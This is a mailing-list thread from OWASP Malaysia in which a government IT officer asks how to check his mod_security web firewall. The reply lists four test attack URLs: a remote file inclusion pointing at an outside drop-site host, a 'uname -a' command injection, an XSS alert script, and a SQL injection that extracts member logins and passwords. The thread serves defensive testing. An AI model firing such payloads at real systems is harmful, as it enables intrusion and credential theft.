[Owasp-Malaysia] How to test mod_security

Adnan bin Mohd Shukor adnan.shukor at gmail.com
Sun Sep 5 10:28:56 EDT 2010


On 05/09/2010, Muzamir Mokhtar <muzamir at pahang.gov.my> wrote:
> Salam,
>
> I have setup mod_security in my httpd.
> I have use rules from owasp.
> I have enable the rules and use the default ruleset.
> I have enable audit log.
>
> Question :
> 1) How do i know my mod_security is working properly?

try basic attack:

http://cobaan.pahang.gov.my/index.php?page=http://www.rfi-drop-site.net/rfi.txt????????
http://cobaan.pahang.gov.my/index.php?exec=uname -a
http://cobaan.pahang.gov.my/index.php?search=<script>alert(123);</script>
http://cobaan.pahang.gov.my/index.php?id=-13+union+select+concat_ws%280x3a,member_id,member_first_name,member_last_name,member_login,member_password%29,2,3,4+from+members--

kalau installation anda berjaya, anda akan mendapat error 403 :)

> 2) Is there any additional modification i need to do in order to block
> the vulnerable attack such as sql injection, xss, spam comment and
> others.

as you mentioned, rules from owasp has been used :) so dah tak perlu
modify apa2 untuk sql injection, RFI, remote command injection, xss.

but for spam comment, letak la captcha, hensem kot :)

P/S: koi orang pahang jugak! :P

>
> Please do advice me on this.
>
> --
> Muzamir bin Mokhtar,
> Pegawai Teknologi Maklumat (F44)
> Unit Operasi
> Bahagian Teknologi Maklumat
> Pej SUK Pahang
> TEL : 095129424/425
> FAX : 095163490
> http://muzzoshah.blogspot.com
> http://muzzotechspot.blogspot.com
>
>
> ----------------------------------------------------------------
> DISCLAIMER:
> This e-mail and the attachment is from State Government of Pahang,
> Malaysia. It is intended solely for the person to whom they are
> addressed and may be confidential and privileged. If you are not the
> intended recipient, you are notified that disclosing, distributing,
> copying or taking any action in reliance of the content of this
> information is strictly prohibited. Please notify the sender
> immediately if you have received this e-mail and delete it from your
> system. The recipient should check the e-mail and any attachment for
> the presence of viruses that could be transmitted via e-mail. Email
> transmission cannot be guaranteed to be secure or error free as
> information could be intercepted, corrupted, lost, destroyed,
> incomplete or contain viruses. State Government of Pahang, Malaysia
> accepts no liability for any errors or omissions in the contents of
> this message which arises as a result of e-mail transmission.
> Opinions, conclusions and other information in this e-mail that does
> not relate to the official business of State Government of Pahang,
> Malaysia shall be understood as neither given nor endorsed by State
> Government of Pahang, Malaysia.
>
>
> --
> This message has been scanned for viruses and
> dangerous content by MailScanner, and is
> believed to be clean.
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>


More information about the Owasp-Malaysia mailing list